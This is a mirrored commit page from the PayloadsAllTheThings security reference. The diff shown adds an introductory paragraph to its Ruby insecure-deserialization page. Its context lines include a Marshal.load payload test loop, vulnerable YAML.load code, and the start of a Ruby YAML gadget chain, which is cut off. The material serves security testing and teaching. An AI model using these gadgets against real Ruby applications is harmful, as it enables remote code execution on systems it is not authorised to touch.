gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

Normalize page header for GraphQL, Deserialization, SCM

Browse Source
This commit is contained in:
Swissky
2024-11-10 14:37:48 +01:00
parent 2deb20a6f1
commit 2304101657
21 changed files with 262 additions and 129 deletions
Download Patch File Download Diff File Expand all files Collapse all files

5
Insecure Deserialization/Ruby.md
View File

@@ -1,5 +1,8 @@
# Ruby Deserialization
> Ruby deserialization is the process of converting serialized data back into Ruby objects, often using formats like YAML, Marshal, or JSON. Ruby's Marshal module, for instance, is commonly used for this, as it can serialize and deserialize complex Ruby objects.
## Summary
* [Marshal.load](#marshalload)
@@ -18,12 +21,14 @@ for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1
## Yaml.load
Vulnerable code
```ruby
require "yaml"
YAML.load(File.read("p.yml"))
```
Universal gadget for ruby <= 2.7.2:
```ruby
--- !ruby/object:Gem::Requirement
requirements: